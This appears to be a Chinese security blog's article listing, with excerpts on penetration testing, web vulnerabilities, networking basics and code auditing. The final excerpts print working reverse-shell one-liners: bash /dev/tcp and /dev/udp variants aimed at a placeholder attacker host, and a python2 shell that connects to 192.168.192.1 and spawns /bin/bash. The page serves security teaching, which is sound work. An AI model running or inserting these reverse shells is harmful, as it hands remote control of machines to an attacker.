_PowerShell
网安圈子的小菜鸟
展开
-
[ 红队知识库 ] 各种重要文件路径
[ 红队知识库 ] 各种重要文件路径原创 2023-03-09 23:00:00 · 1925 阅读 · 0 评论 -
[ 红队知识库 ] 一些常用bat文件集合
[ 红队知识库 ] 一些常用bat文件集合常用bat文件,我一般用于拿到权限后的演示,当然也可以玩,有部分危险操作,请规范使用原创 2023-03-08 21:45:17 · 2015 阅读 · 0 评论 -
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)原创 2023-03-16 21:00:00 · 654 阅读 · 0 评论 -
[ 常用工具篇 ] burpsuite_pro 安装配置详解(附安装包)
[ 常用工具篇 ] burpsuite_pro 安装配置详解(附安装包)BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通过拦截HTTP/HTTPS的web数据包,当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试。原创 2023-01-09 20:00:00 · 952 阅读 · 2 评论 -
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。原创 2022-01-11 23:05:54 · 1415 阅读 · 29 评论 -
[ web基础篇 ] session,cookie,token 那些事儿 ?
session ?cookie ?token ?相信大家对这几个词并不陌生,不管是面试还是工作都会有涉及的,可想而知它的重要性。网上关于 session、cookie、token 的文章有很多,每篇文章都有一些独特的见解。在写文章之前,我看了很多篇 session、cookie、token 的文章,感觉很多都没有讲的很清楚,泛泛而谈。在看了这么多的文章之后,我对这几次词又有了不一样的理解,在这里和大家分享一下。原创 2021-12-14 16:55:45 · 2230 阅读 · 25 评论 -
[ web漏洞篇 ] 业务逻辑漏洞详解
目录什么是业务逻辑漏洞:业务逻辑漏洞产生的核心原因:应用中的缺陷通常分为两种类型:逻辑漏洞主要产生的位置登录处存在的逻辑漏洞1.可以暴力破解用户名或密码:2.session没有清空:业务办理处存在的逻辑漏洞水平越权篡改手机号验证码处存在的逻辑漏洞登录验证码未刷新手机或邮箱验证码可爆破手机或邮箱验证码回显到客户端修改response包绕过判定支付处存在的逻辑漏洞修改商品编号金额修改商品数量修改通过前端限制限购商品充值中放弃订单原创 2021-11-19 09:03:16 · 1752 阅读 · 10 评论 -
[ 面试总结篇 ] 渗透测试面试总结(二)
观安原创 2021-11-19 09:27:57 · 1350 阅读 · 1 评论 -
[ web 漏洞篇 ] 常见web漏洞总结之 SQL 注入总结
目录Sql注入含义:Sql注入的原理:Sql注入产生条件:Sql注入的危害:Sql注入漏洞检测和判断:sql注入的防御:SQL注入的分类(8种):堆叠注入:盲注:宽字节注入:延时注入:常用函数:注入常用函数以及语句mysql写入一句话:字符串连接函数Sql注入waf绕过白盒绕过黑盒绕过Fuzz测试Sql注入含义:由于程序员对用户输入的数据的合法性没有进行判断和处理,导致攻击者可以在web应用程序中事先定义好的sql语句中添加原创 2021-11-19 10:09:42 · 3806 阅读 · 23 评论 -
[ 网络模型篇 ]大白话告诉你什么是OSI七层模型
此文出现的所有协议在后续都会有详细介绍原创 2021-12-01 09:51:39 · 5087 阅读 · 16 评论 -
[ 网络协议篇 ] 静态路由那些事 ?
聊一聊基础的静态路由静态路由 默认路由 缺省路由 浮动路由 黑洞路由 路由黑洞(哈哈哈哈)原创 2021-12-08 07:19:22 · 672 阅读 · 18 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(一)
肉鸡、抓鸡、堡垒机、木马、大马小马、挂马、网页木马、一句话木马、后门一句话后门、Shell、webshell、交互shell、远控托库、社工库、撞库、社会工程学、权限提权、弱口令、溢出、Root、rootkit原创 2021-12-09 08:14:12 · 6218 阅读 · 36 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(二)
IPC$、默认共享、注入、注入点、C段渗透旁段入侵、内网、外网、脚本注入攻击、中间人攻击欺骗攻击、ARP攻击、CC攻击、拒绝服务攻击、Dos攻击DDos、洪水攻击、SYN攻击、供应链攻击、鱼叉攻击钓鲸攻击、水坑攻击、APT攻击、商业电子邮件攻击、电信诈骗原创 2021-12-09 15:02:20 · 2514 阅读 · 14 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(三)
网络钓鱼、社会工程学攻击、假托、蜜罐、免杀花指令、加壳、脱壳、软件加壳、软件脱壳渗透测试、渗透、黑盒测试、白盒测试、灰盒测试黑帽黑客、白帽黑客、红帽黑客、红队、蓝队紫队、ip地址、端口、端口扫描、反弹端口原创 2021-12-11 13:36:38 · 2416 阅读 · 10 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(四)
端口映射、路由器、交换机、网关、独立服务器proxy、WAF、防火墙、反病毒引擎、防毒墙IDS、NIDS、IPS、规则库、侵预告警、漏报、NAC、上网行为管理、下一代VPN、边界防御、蠕虫病毒、杀毒软件、恶意软件原创 2021-12-12 21:50:17 · 738 阅读 · 12 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(六)
ICMP、DNS、CDN、TCP/IP、OSILAN、MAN、WAN、EXP、POCpayload、shellcode、HTML、CSS、JavascriptCMS、VPS、源损耗、域名、URLcURL、URI、URN、CTF、AWD原创 2021-12-15 10:28:04 · 3907 阅读 · 7 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(七)
CVE、SRC、CNVD、0day、1dayNday、C2、横移、暴库、CA证书数字证书、SSL证书、数字签名、漏扫、UTM网闸、数据库审计、DLP、SD-WAN、SOCSIEM、MIME、沙箱、沙箱逃逸、网络靶场原创 2021-12-15 15:56:45 · 5613 阅读 · 21 评论 -
[ 渗透入门篇 ] 渗透行业必备术语大集合(全 -- 五万字总结)
学渗透是一个漫长的过程,需要掌握的知识点很广,需要心无旁骛地去学。有关这方面的专业术语有很多很多,这里总结了常见的200个,在这里分享一下。原创 2021-12-18 11:42:59 · 3675 阅读 · 32 评论 -
[ web基础篇 ] HTTP状态码表
HTTP 状态码分类原创 2021-12-19 19:47:50 · 359 阅读 · 2 评论 -
[ 网络协议篇 ] 一篇文章让你掌握什么是 HTTP ?
HTTP 和 HTTPS 是老生常谈的问题,无论是在校学习还是找工作,老师和面试官几乎都会问道HTTP 是什么?HTTPS 是什么?他们有什么区别 ?其实学好 HTTP 和 HTTPS 是很重要的,有利于我们后续的学习和参加工作。相信平时上网的时候也很少有人关注这个问题,只是知道计算机网络里 HTTP 的概念。原创 2021-12-19 20:08:50 · 443 阅读 · 7 评论 -
[ 网络协议篇 ] 一篇文章让你掌握什么是 HTTPS ?
HTTP 和 HTTPS 是老生常谈的问题,无论是在校学习还是找工作,老师和面试官几乎都会问道HTTP 是什么?HTTPS 是什么?他们有什么区别 ?其实学好 HTTP 和 HTTPS 是很重要的,有利于我们后续的学习和参加工作。相信平时上网的时候也很少有人关注这个问题,只是知道计算机网络里 HTTP 的概念。其实这一块的知识延伸很广,还需要了解加密算法和 SSL 协议。未来几篇文章我们就来聊一聊这几个问题,相信仔细看完,会有很大收获。原创 2021-12-20 19:04:40 · 2918 阅读 · 23 评论 -
[ 渗透入门篇 ] 从渗透测试执行标准着手的渗透学习大纲。掌握了这些知识点还担心找不到工作?
想要学好渗透,就必须须知渗透测试流程标准。这篇文章根据诸葛建伟翻译脑图来介绍渗透率流程执行标准。本文以思维导图为主,后续会有每一个知识点的详细介绍。学会了这些知识点,工作应该是妥妥的。原创 2021-12-21 21:52:40 · 6755 阅读 · 22 评论 -
[ 网络协议篇 ] vlan 详解之 super vlan 详解
Super VLAN 主要通过实现多个 VLAN 共用同一个 IP 网段,从而达到节省IP地址资源的目的。原创 2021-12-22 11:03:20 · 7922 阅读 · 27 评论 -
[ 代码审计篇 ] Java web 代码审计 详解(一)
Java web 的代码审计 第一篇 Java web 的代码审计 思路原创 2021-12-24 19:28:02 · 4018 阅读 · 4 评论 -
[ 代码审计篇 ] Java web 代码审计 详解(三)--- java web 所需知识之javaEE分层模型
由于我们开始 java web 代码审计的学习,我们必须要有一定的前导知识,当然这里重点这不是学 java 所以讲的也比较简单。原创 2021-12-31 22:25:30 · 344 阅读 · 8 评论 -
[ 代码审计篇 ] Java web 代码审计 详解(三)--- java web 所需知识之 Servlet 介绍
???? 博主介绍 ???????? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步!本文介绍的是代码审计前导知识 java web 所需知识之 servlet 知识目录???? 博主介绍原创 2022-01-01 11:37:06 · 507 阅读 · 5 评论 -
[ 常用工具篇 ] Esxi 安装详解
Esxi 是一款虚拟化系统,与 VMware,VirtualBox不同,它不需要安装在其他操作系统上,直接运行在裸机上;占用系统资源很小,易于管理,所以被大多数中小型公司所使用;今天主要讲如何将ESXI 安装于裸机上,我们这里使用Vmware模拟真实物理机。原创 2022-01-01 21:19:17 · 4407 阅读 · 2 评论 -
GRE Over IPsec
GRE Over IPsec(GRE 结合 IPsce)IPsec: 不支持组播(意味着不能传递路由 IGP路由利用组播学习)(不是传递路由表 而是 通过ACL交给隧道 走公网 )不支持其他网络协议只支持IPGRE: 找路由表(更灵活 不用写ACL 用IPsce 需要写很多ACL GRE不需要)IPsce IP安全的虚拟专用网络通用路由封装协议GRE 协议号47 支持多个上层协议IPX协议 OSI模型里面的GRE...原创 2022-01-06 22:32:10 · 1328 阅读 · 1 评论 -
[ 数据库 ] MySQL 入门到放弃(一) --- MySQL 介绍 && 安装和连接
狂神说 mysql 学习笔记1.1、为什么学习数据库岗位需求 现在的世界,大数据时代 得数据者得天下 被迫需求:存数据 数据库是所有软件体系中最核心得存在DBA1.2、什么是数据库数据库(DB,DataBase)概念:数据仓库,软件,安装在操作系统(window,linux,mac,…)之上!SQL,可以存储大量得数据,500万数据作用:存储数据,管理数据1.3、数据库分类关系型数据库:(SQL)MySQL,Oracle,Sql Server,DB2 ,...原创 2022-01-06 22:48:58 · 560 阅读 · 4 评论 -
[ web 漏洞篇 ] 常见web漏洞总结之 RCE 远程代码 / 命令执行漏洞总结
???? 博主介绍 ???????? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步!目录???? 博主介绍 一、RCE 介绍二、原理三、防御四、php能远程执行的函数1. 命原创 2022-01-13 20:57:21 · 2495 阅读 · 10 评论 -
[ web 漏洞篇 ] 常见web漏洞总结之 文件包含漏洞 总结
???? 博主介绍 ???????? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步!目录???? 博主介绍 一、可导致文件包含的函数:1. include() :2. include原创 2022-01-13 21:09:04 · 4217 阅读 · 14 评论 -
老大给的三个问题
???? 博主介绍???????? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步!问题:1. 安服部门需要什么样的人。(部门需要你做什么)2. 安服部门能提供什么资源。(部门能给你什么)原创 2022-02-15 15:32:43 · 395 阅读 · 1 评论 -
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
一、漏洞编号二、漏洞靶场三、漏洞影响版本四、FOFA Dork/Google Dork五、利用漏洞风险六、漏洞修复方案七、漏洞利用过程原创 2022-04-14 10:35:18 · 4985 阅读 · 3 评论 -
[ 网络安全基础篇 ]常见 Web 漏洞的描述及其修复建议(相对全面)
🍬 博主介绍👨🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!目录🍬 博主介绍写在前面1. 用户名枚举漏洞漏洞描述修复建议2. 弱口令漏洞描述修复建议3. 暴力破解漏洞描述修复建议...原创 2022-05-26 23:16:53 · 7293 阅读 · 32 评论 -
[ CTF 学习 ] CTF 中的隐写集合 —— 图片隐写术
运用载体隐藏信息数据在隐藏的时候,我们常常是需要先分析是数据隐藏在哪里,也就是他在利用是什么做载体,之后才可以进一步的分析是加密或编码的。我们要对一个图片的格式要有了解,才能知道哪些地方是可疑的,哪些是会有冗余的成分在可以隐藏起信息的......原创 2022-07-20 17:39:37 · 2616 阅读 · 19 评论 -
[ 基础漏洞篇 ] webpack 前端源码泄露详解
👨🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!目录🍬 博主介绍一、webpack 介绍1. 什么是 webpack?2. webpack 的主要功能是什么?3. webpack 使用不当能造成什么样的危害?二、webpack 前端源码泄露挖掘1. 手工挖掘1. 查找使用webpack的网页2. 下载源码。...原创 2022-08-04 21:31:37 · 6002 阅读 · 58 评论 -
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...原创 2022-08-03 08:30:00 · 1672 阅读 · 20 评论 -
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shell
[ 隧道技术 ] 反弹shell的集中常见方式(二)bash反弹shellbash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2原创 2022-09-04 17:29:23 · 830 阅读 · 23 评论 -
[ 隧道技术 ] 反弹shell的集中常见方式(三)powercat反弹shell
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。原创 2022-09-04 17:29:57 · 719 阅读 · 54 评论 -
[ 隧道技术 ] 反弹shell的集中常见方式(四)python反弹shell
python反弹shellpython2 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.192.1',55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"原创 2022-09-06 22:00:00 · 1312 阅读 · 11 评论